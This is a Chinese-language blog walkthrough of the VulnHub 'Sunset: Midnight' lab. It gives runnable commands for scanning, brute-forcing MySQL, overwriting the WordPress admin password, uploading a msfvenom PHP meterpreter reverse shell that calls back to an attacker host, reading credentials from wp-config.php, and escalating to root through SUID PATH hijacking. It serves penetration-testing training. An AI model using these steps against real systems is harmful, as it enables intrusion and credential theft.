PJzhang:vulnhub靶機(jī)sunset系列SUNSET:MIDNIGHT

貓寧~~~

地址：https://www.vulnhub.com/entry/sunset-midnight,517/

關(guān)注工具和思路。

nmap 192.168.43.0/24

靶機(jī)IP 192.168.43.113

nmap -A -p1-65535 192.168.43.113

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1

訪問(wèn)http://192.168.43.113/，跳轉(zhuǎn)http://sunset-midnight/

vim /etc/hosts
192.168.43.113 sunset-midnight

訪問(wèn)http://sunset-midnight/，是一個(gè)wordpress網(wǎng)站

http://sunset-midnight/wp-login.php

wpscan --url http://sunset-midnight/ --enumerate u

wpscan --url http://sunset-midnight/ u admin -P mima.txt -t 100

hydra 192.168.43.113 mysql -l root -P /usr/share/wordlists/rockyou.txt -t 1

[3306][mysql] host: 192.168.43.113 login: root password: robert

出現(xiàn)unblock with 'mysqladmin flush-hosts'，重啟靶機(jī)再次爆破

mysql -uroot -p -h sunset-midnight

show databases;
use wordpress_db;
show tables;
select user_pass from wp_users;
密碼顯示$P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/

123456 MD5加密為e10adc3949ba59abbe56e057f20f883e

update wp_users SET user_pass="e10adc3949ba59abbe56e057f20f883e" where id=1;

wordpress后臺(tái)賬號(hào)密碼是admin/123456

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw > muma.php

appearance---themes---上傳muma.php

訪問(wèn)http://sunset-midnight/muma.php/，顯示http://sunset-midnight/wp-content/uploads/2020/09/muma.php

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

訪問(wèn)http://sunset-midnight/wp-content/uploads/2020/09/muma.php，反彈shell

shell
python -c "import pty;pty.spawn('/bin/bash')"
www-data@midnight:/var/www/html/wordpress/wp-content/uploads/2020/09$

cat /etc/passwd
jose:x:1000:1000:jose,,,:/home/jose:/bin/bash，值得關(guān)注

進(jìn)入/var/www/html/wordpress，查看wp-config.php

/** MySQL database username */
define( 'DB_USER', 'jose' );
/** MySQL database password */
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );

https://www.cmd5.com/
https://www.somd5.com/

sudo -l 無(wú)法使用

su jose
密碼是645dc5a8871d2a4269d4cbe23f6ae103

sudo -l用不了

尋找suid文件
find / -perm -u=s -type f 2>/dev/null

/usr/bin/status值得關(guān)注

cd /tmp
echo "/bin/bash" > service
chmod 777 service
echo $PATH
export PATH=/tmp:$PATH
status

獲取root權(quán)限
root@midnight:/tmp#
cat user.txt，家目錄
956a9564aa5632edca7b745c696f6575

posted @ 2020-09-10 23:08 PJzhang 閱讀(662) 評(píng)論(0) 收藏舉報(bào)

刷新頁(yè)面返回頂部

PJzhang

南美的那只蝴蝶已經(jīng)扇動(dòng)了翅膀。

PJzhang:vulnhub靶機(jī)sunset系列SUNSET:MIDNIGHT

公告